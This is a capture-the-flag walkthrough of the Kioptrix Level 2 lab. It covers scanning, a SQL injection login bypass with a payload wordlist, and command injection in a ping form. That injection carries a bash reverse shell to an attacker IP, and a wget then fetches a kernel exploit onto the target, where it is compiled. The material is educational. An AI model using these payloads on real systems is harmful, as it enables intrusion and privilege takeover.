KIOPTRIX LAB LEVEL [II]
The roadmap for exploiting this machine my way, and the knowledge you should have, is the following:
1. Know how to exploit SQL injection in order to bypass the application login on index.php.
2. Know how to modify the web content of a vulnerable application on the client (browser) side.
3. Know how to exploit remote command execution via a form.
4. Know how to obtain a reverse shell as the apache user.
5. Know how to perform privilege escalation by exploiting a known kernel vulnerability in the operating system.
You can find the whole penetration testing process for this machine in the following video:
Complete walkthrough of the season's content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We can use a couple of tools for this task. One of them is arp-scan, which sends ARP requests to the broadcast address and waits for the hosts' replies over the same protocol, as you can see below:
The other tool is netdiscover, which works on the same principle but takes the interface as a parameter:
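As an added example (not part of the original walkthrough), the same ARP discovery can be scripted: the function below runs arp-scan on one interface and parses its host table into (ip, mac, vendor) tuples. arp-scan must be installed and the script run as root; the interface name eth0 and the sample output used for the offline test are constructed assumptions.

```python
"""Scripted ARP host discovery with arp-scan (added example, not the walkthrough's code).
parse_arp_scan() is exercised on constructed output, so it runs offline; discover()
needs arp-scan installed and root privileges."""
import re
import subprocess

# Constructed sample of arp-scan's table output; addresses and vendors are made up.
SAMPLE_OUTPUT = """Interface: eth0, type: EN10MB, MAC: 00:0c:29:aa:bb:cc, IPv4: 192.168.1.42
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1\t52:54:00:12:35:00\tQEMU
192.168.1.102\t00:0c:29:11:22:33\tVMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.001 seconds (127.94 hosts/sec). 2 responded
"""

# One host line: IPv4 address, MAC address, optional vendor string.
HOST_LINE = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s*(.*)$", re.I
)


def parse_arp_scan(text):
    """Return [(ip, mac, vendor), ...] for every host line in arp-scan output.
    Banner and summary lines do not match the pattern and are skipped."""
    hosts = []
    for line in text.splitlines():
        m = HOST_LINE.match(line.strip())
        if m:
            hosts.append((m.group(1), m.group(2).lower(), m.group(3).strip()))
    return hosts


def discover(interface="eth0"):
    """Run arp-scan against the local subnet of one interface (root required)."""
    result = subprocess.run(
        ["arp-scan", f"--interface={interface}", "--localnet"],
        capture_output=True, text=True, check=True,
    )
    return parse_arp_scan(result.stdout)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; swap for discover("eth0") on a lab network.
    for ip, mac, vendor in parse_arp_scan(SAMPLE_OUTPUT):
        print(f"{ip:16} {mac}  {vendor}")
```

arp-scan only sees hosts on the same layer-2 segment, so a host that does not answer ARP (or that sits behind a router) has to be found with nmap instead.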
NMAP:
In this step, from the attacker machine we gather information about the open ports and services of our target machine. We can use some options to run the default scripts (-sC) and detect versions (-sV), which gives us information about possible vulnerabilities on the remote host.
# Nmap 7.91 scan initiated Sun Aug  8 11:43:48 2021 as: nmap -sC -sV -T4 -n -oN target_name 192.168.1.102
Nmap scan report for 192.168.1.102
Host is up (0.00082s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            787/udp   status
|_  100024  1            790/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-08-07T08:53:41+00:00; -1d00h50m15s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
Host script results:
|_clock-skew: -1d00h50m15s
The conclusion of the nmap scan is that we found the following open ports and services:
22/tcp   OpenSSH 3.9p1, with SSHv1 still enabled
80/tcp   Apache httpd 2.0.52 (CentOS)
111/tcp  rpcbind
443/tcp  HTTPS on the same Apache, with an expired self-signed certificate and SSLv2 plus export-grade ciphers still accepted
631/tcp  CUPS 1.1, advertising the PUT method
3306/tcp MySQL, which refuses remote connections (unauthorized)
Apache 2.0.52 and OpenSSH 3.9p1 are the versions shipped with CentOS 4, so the system is old and an unpatched 2.6 kernel is likely; that matters later for privilege escalation.
EXPLOITATION:
In the exploitation phase we are going to check all the services and versions that are open on the victim machine.
22: ssh
ssh root@192.168.1.102
Unable to negotiate with 192.168.1.102 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
This is not a fault on the target: the server (OpenSSH 3.9p1) only offers SHA-1 based Diffie-Hellman key exchange methods, which modern OpenSSH clients disable by default, so client and server have no key exchange method in common. The connection can be forced by re-enabling one of the offered methods on the client with -oKexAlgorithms=+diffie-hellman-group14-sha1 (recent clients may also need -oHostKeyAlgorithms=+ssh-rsa), but without credentials that only gets us a password prompt, so we move on to the web service.
80: http and 443:https
Exploiting the login panel via SQL injection, using Burp Suite Community Edition as a proxy to intercept the requests between the browser and the Apache server.
Intercepted request:
**Using a SQL injection wordlist for the attack process:
Sort the server responses by length in ascending order; the failed logins all have the same length, so the payload whose response length differs is the one that bypassed the login:
Using this statement we gain access to the application, bypassing the login. On the next page, however, we found a markup error in the HTML, and because of it the browser does not render the form content correctly. How to resolve the problem:
    1. Obtain the source code of the web application from the browser.
    2. Fix the mistakes and change the form action to an absolute path, so the form still submits to the vulnerable script on the victim.
    3. Publish the web content on a web server on the attacker machine, i.e. the apache2 service.
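As an added example (not code from the walkthrough), the login bypass can be reproduced offline in Python against an in-memory SQLite table. The vulnerable function builds the query by string concatenation, the way the common PHP pattern "SELECT ... WHERE username='$u' AND password='$p'" does; the user table, credentials and the small injection wordlist are constructed. What Burp shows as a response of different length is here simply the query returning a row.

```python
"""SQL injection login bypass, simulated against SQLite (added example, not the
walkthrough's code). Table contents and wordlist are constructed."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")  # constructed credentials
    return conn


def login_vulnerable(conn, username, password):
    """Query built by concatenation: quotes in the input change the SQL structure."""
    query = ("SELECT username FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        # A database error on a quote character is the first sign of injectable input.
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# A short injection wordlist of the kind fed to Burp Intruder (constructed).
WORDLIST = ["admin", "' OR 1=1 -- ", "' OR '1'='1", "admin' -- ", "\" OR 1=1 -- "]


def fuzz_login(conn, wordlist, login=login_vulnerable):
    """Try every payload as the username with a bogus password; return those that log in."""
    return [w for w in wordlist if login(conn, w, "x") is not None]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fuzz_login(db, WORDLIST))
    print("parameterised:", fuzz_login(db, WORDLIST, login_safe))
```

Note that "' OR '1'='1" in the username field does not work here: AND binds tighter than OR, so the clause becomes username='' OR ('1'='1' AND password='x'), which is false. That payload only succeeds in the password field, which is why fuzzing a whole wordlist and sorting by response length finds a working payload faster than guessing one.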
Original source code:
Modified source code:
kali@kali:/var/www/html$ sudo /etc/init.d/apache2 start
Starting apache2 (via systemctl): apache2.service.
Nice, now from our custom web page we can send requests from the attacker machine to the following target on the victim machine:
In this case the PHP source code of the application is vulnerable too, and we found a remote command execution on the target server:
Gaining access to the target machine via a reverse shell. In the form field:
192.168.1.1; bash -i >& /dev/tcp/192.168.1.42/8989 0>&1
On the attacker machine:
Explaining the process: the script on the server builds a ping command line from the form value and hands it to a shell, so the ';' ends the ping command and the shell goes on to run bash -i, an interactive bash. The redirection >& /dev/tcp/192.168.1.42/8989 sends that shell's stdout and stderr over a TCP connection to the attacker machine on port 8989 (bash opens /dev/tcp/host/port as a socket), and 0>&1 makes its stdin read from the same socket. A netcat listener must already be waiting on port 8989 on the attacker side when the form is submitted, and the shell arrives with the privileges of the apache user.
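As an added example (Python standing in for the target's PHP, not the walkthrough's code), the block below shows why the payload above works and how the ping form should have been written. The vulnerable builder mirrors the pattern of concatenating the form value into "ping -c 3 ..." for a shell; shell_commands() tokenises the result the way a POSIX shell would, to show the second command hiding in it; the hardened version validates the value as an IP literal and runs ping without a shell. The payload is the one from the form above (attacker 192.168.1.42, port 8989).

```python
"""Command injection through a ping form, and its fix (added example, not the
walkthrough's PHP)."""
import ipaddress
import shlex
import subprocess

# The value typed into the form in the walkthrough.
PAYLOAD = "192.168.1.1; bash -i >& /dev/tcp/192.168.1.42/8989 0>&1"

# Shell operators that start a new command; '>&' and '0>&1' are redirections, not separators.
SEPARATORS = {";", "&&", "||", "|", "&"}


def vulnerable_command(target):
    """The bug: splice the form value straight into a command line meant for a shell."""
    return "ping -c 3 " + target


def shell_commands(cmdline):
    """Split a command line into the separate commands a POSIX shell would run.
    Uses shlex with punctuation_chars so ';', '&&', '|' etc. become their own tokens.
    (A newline would also separate commands; it is treated as whitespace here.)"""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_valid_target(value):
    """Accept only a literal IPv4/IPv6 address; anything else (hostnames included) is rejected."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def safe_command(target):
    """Validate the value, then pass it as a single argv element, never through a shell."""
    if not is_valid_target(target):
        raise ValueError("target must be an IP address literal")
    return ["ping", "-c", "3", str(ipaddress.ip_address(target.strip()))]


def run_ping(target):
    """Execute the validated command without shell=True; the value cannot become a second command."""
    return subprocess.run(safe_command(target), capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    for cmd in shell_commands(vulnerable_command(PAYLOAD)):
        print("shell would run:", " ".join(cmd))
    print("valid target?", is_valid_target("192.168.1.1"), is_valid_target(PAYLOAD))
```

Validation alone is not the fix: even a validated value should be passed as an argv element, and a value that only needed to look like a hostname (letters, dots, dashes) could still not smuggle an operator past the list form.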
PRIVILEGE ESCALATION:
The kernel version has a known public vulnerability with an available exploit (Exploit-DB entry 9542), which we fetch from a web server on the attacker machine:
bash-3.00$ wget http://192.168.1.42:8989/9542
--06:01:24--  http://192.168.1.42:8989/9542
           => `9542'
Connecting to 192.168.1.42:8989... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]

    0K ..                                                    100%  840.19 MB/s

06:01:24 (840.19 MB/s) - `9542' saved [2643/2643]
Compile the exploit on the target machine (gcc is available on it):
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc -o kernel_exploit 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls -ltrh
total 112K
-rwxr-xr-x 1 apache apache 6.8K Aug 7 06:02 kernel_exploit
-rw-r--r-- 1 apache apache 2.6K Aug 8 2021 9542.c